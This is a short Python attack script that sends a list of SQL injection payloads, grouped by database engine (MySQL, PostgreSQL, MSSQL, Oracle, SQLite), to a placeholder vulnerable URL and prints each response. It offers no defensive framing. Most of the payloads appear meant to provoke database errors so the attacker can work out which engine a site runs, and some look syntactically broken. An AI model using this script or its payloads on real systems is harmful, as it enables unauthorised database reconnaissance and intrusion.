Copy import requests
url = "http://example.com/vulnerable.php"
payloads = [
# MySQL
"' AND EXP(~(SELECT * FROM (SELECT 1) t)) -- ",
"' AND 0xG1 -- ",
"' AND (SELECT * FROM (SELECT 1,2) t) = 1 -- ",
# PostgreSQL
"' AND 'a' ~ 'b[' -- ",
"' AND jsonb_path_query_first('{'a':1}', '$.a') -- ",
"' AND WITH RECURSIVE t AS (SELECT 1 UNION ALL SELECT 1 FROM t) SELECT * FROM t -- ",
# MSSQL
"; DECLARE @xml XML; SET @xml = '<root><a></a><b></b></root>'; SELECT @xml.value('(/root/c)[1]', 'INT') -- ",
"; SELECT CAST('text' AS INT) -- ",
"; RAISERROR('Error generated', 16, 1) -- ",
# Oracle
"' UNION SELECT UTL_INADDR.get_host_address('invalid_host') FROM dual -- ",
"' UNION SELECT XMLType('<invalid><xml>') FROM dual -- ",
"' UNION SELECT SYS.DBMS_ASSERT.noop('invalid_input') FROM dual -- ",
# SQLite
"' UNION SELECT SUBSTR('text', -1, 1) -- ",
"' UNION SELECT POW('text', 2) -- ",
"' UNION SELECT DATE('invalid_date') -- ",
]
for payload in payloads:
response = requests.get(url, params={"id": payload})
print(f"Payload: {payload}")
print(f"Response: {response.text}\n")